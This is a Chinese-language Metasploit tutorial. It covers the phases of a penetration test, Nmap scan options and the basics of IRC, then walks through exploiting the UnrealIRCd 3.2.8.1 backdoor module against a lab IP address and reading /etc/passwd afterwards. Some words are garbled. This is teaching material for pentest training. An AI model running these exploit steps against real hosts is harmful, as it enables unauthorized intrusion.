Metasploit 進階第一講 攻擊流程及命令介紹
01.滲透測試過程環節(PTES)
1.前期交互階段:與客戶組織進行交互討論,確定范圍,目標等
2.情報搜集階段:獲取更多目標組織信息,Nmap、Nessus等
3.威脅建模階段:理清頭緒,確定出最可行的攻擊通道
4.漏洞分析階段:搜索可獲取的滲透代碼資源
5.滲透攻擊階段:找出安全漏洞,入侵系統
6.后滲透攻擊階段:你想干什么,Mctcrprctcr
7.報告階段:滲透測試報告
02. Metasploit漏洞利用環節
情報搜集階段
外圍信息搜索 - Google Hacking等
主機探測與端口掃描 -Nmap等
服務掃描 -auxiliary/scanner/tclnet/…等(見目錄)
網絡漏洞掃描 -OpenVAS、Nessus等
情報搜集階段—Nmap
格式:nmap<掃描選項,<掃描目標>
·掃描選項:指定掃描方式 ·掃描目標:
-sn -探測存活主機,不掃描端口 單個p地址
-o -目標操作系統識別 多個p地址,用逗號分割(,)
-sV -詳細服務版本信息 連續ip地址,用連字符號(-)
-f -快速掃描 CIDR表示,192.168.22.0/24
-sT/-sS/-sA -全連接/syn掃描/ack掃描,
同auxiliary/scanner/portscan/..模塊
-sU -udp端口掃描了
-p<端口范圍> 指定掃描端口
…
Nmap –sV -o 192.168.24.139
狀態:
open 應用程序正在此端口監聽
closed 主機響應,無應用程序監聽
filtered 不確定是否開放
unfiltered 無法確定端口是否開放(僅出現在ack掃描時)
nmap -A -p 6667 192.168.24.139
情報搜集階段--其他姿勢
漏洞分析階段
IRC:“Internet Rely Chat”的縮寫,網絡中繼聊天,通過網絡的即時交流工具。
IRC運作方式:是一種分布式的客戶端/服務器的結構,一個IRC服務器內部包含多個IRC頻道,這些頻道和qq群類似。若頻道不是保留頻道且頻道中無人,該頻道就會消失,而想加入某個頻道,若頻道名不存在,則會創建這個頻道,創建者為管理員,頻道內部可私聊。
IRC端口:服務器端口:6667,客戶端端口:6697,連接使用的是SSL。
1.msfconsole -啟動metasploit框架
2.search unreal ircd3.2.8.1 -在metasploit框架中查詢相關模塊
3.info exploit/unix/irc/unreal_ircd_3.2.8.1_backdoor -查看模塊信息,命名規則:模塊類型/目標平台/目標服務/模塊名稱
4.cat/usr/share/metasploit-framework/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb -查看源代碼(也可在目錄中查看)
滲透攻擊階段
1.use exploit/unix/irc/unreal_ircd_3281_backdoor -使用該模塊
2.show options -查看需配置的參數(Required為yes的選項必須配置)
3.set rhosts 192.168.24.139 -配置目標ip地址
4.run/exploit -運行該模塊
5.whoami;cat/etc/passwd -成功后查看目標主機信息
Metasploit漏洞利用流程總結
Metasploit命令:
1. msfconsole
2. search相關模塊
3. use模塊路徑
4. show options
5.set <參數名稱> <參數信息
6.run/exploit
7..